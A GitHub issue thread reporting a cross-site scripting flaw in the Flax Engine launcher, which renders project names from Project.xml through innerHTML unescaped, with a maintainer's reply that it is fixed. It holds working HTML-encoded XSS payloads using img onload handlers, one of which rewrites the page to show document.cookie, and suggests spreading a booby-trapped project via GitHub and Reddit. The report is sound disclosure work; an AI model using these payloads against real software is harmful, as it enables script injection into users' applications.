### ISSUE TITLE
Launcher XSS

### ISSUE THREAD

**Issue by stefnotch** [FlaxEngine/FlaxAPI#68]
**Issue description:**

The Flax Launcher doesn't escape user input. For example `document.getElementById('projects-content').innerHTML = generatedHtml;` where generatedHTML includes the project name.

**Steps to reproduce:**

1) Create a new project
2) Edit the Project.xml to include the following
```
<Project>
	<Name>ZZXXMyProject'&lt;br&gt;hi&lt;br&gt;&lt;img width=150 src=&quot;https://images.pexels.com/photos/20787/pexels-photo.jpg?auto=compress&amp;cs=tinysrgb&amp;dpr=1&amp;w=500&quot;&gt;</Name>
```
4) Open the Flax launcher and stare at the cute cat picture.

 [There are various tools to save you the trouble of manually encoding HTML.](https://mothereff.in/html-entities)

**Additional information:**
This can be abused by getting someone else to download your project. For example, by uploading your project to GitHub and advertising it on Reddit.

Then, the attacker could trivially inject JavaScript into the Launcher and do potentially undesired things. 

The easiest way to pull this attack off is by editing the `<Name>ProjectName</Name>`
**Examples Names:**
alert(1)
```
&lt;img onload=&quot;alert(1)&quot;

src=&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAZdEVYdFNvZnR3YXJlAHBhaW50Lm5ldCA0LjAuMjHxIGmVAAAADUlEQVQYV2P4//8/AwAI/AL+iF8G4AAAAABJRU5ErkJggg==&quot; &gt;
```
Replace the page
```
&lt;img onload=&quot;document.body.innerHTML = &apos;&lt;h1 style=color:white&gt;Haha&apos; + document.cookie + &apos;&lt;/h1&gt;&apos;&quot; 
src=&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAZdEVYdFNvZnR3YXJlAHBhaW50Lm5ldCA0LjAuMjHxIGmVAAAADUlEQVQYV2P4//8/AwAI/AL+iF8G4AAAAABJRU5ErkJggg==&quot; &gt;
```

**Minimal reproduction project:**

[MyProject66.zip](https://github.com/FlaxEngine/FlaxAPI/files/3220090/MyProject66.zip)

**Flax version:**

0.4.6181

**Comment by mafiesto4** [comment]
Fixed.
